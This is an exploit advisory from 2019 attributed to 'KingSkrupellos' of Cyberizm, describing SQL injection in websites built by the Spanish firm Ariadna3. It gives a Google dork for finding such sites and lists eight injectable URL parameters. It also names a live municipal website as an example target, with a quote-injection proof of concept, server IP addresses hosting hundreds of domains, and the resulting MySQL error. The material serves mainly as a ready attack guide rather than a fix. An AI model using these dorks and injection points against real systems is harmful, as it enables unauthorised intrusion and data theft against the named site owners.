####################################################################
# Exploit Title : Ariadna3 Web Design Spain SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : ariadna3.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Powered by ariadna3.com''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################
# SQL Injection Exploit :
***********************
/THIS-PATH-CHANGES/fotografia-galerias.php?ID=[SQL Injection]
/turismo/fotografia-galerias.php?ID=[SQL Injection]
/participa/resource-visagen2.php?sc=participa&ap=actividades&ID=[SQL Injection]
/rutadeldestierro/lib/visualimg.php?IDimg=[SQL Injection]
/ayuntamiento/noticias.php?ID=[SQL Injection]
/noticias.php?ID=[SQL Injection]
/ayuntamiento/bandos.php?ID=[SQL Injection]
/bandos.php?ID=[SQL Injection]
####################################################################
# Example Vulnerable Site :
*************************
[+] aytoateca.es/turismo/fotografia-galerias.php?ID=59%27 =>
[ Proof of Concept ] => archive.is/ePNRc
Note : (46.231.127.49) => There are 267 domains hosted on this server.
Note : (46.231.127.24) => There are 293 domains hosted on this server.
####################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\'' at line 1
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################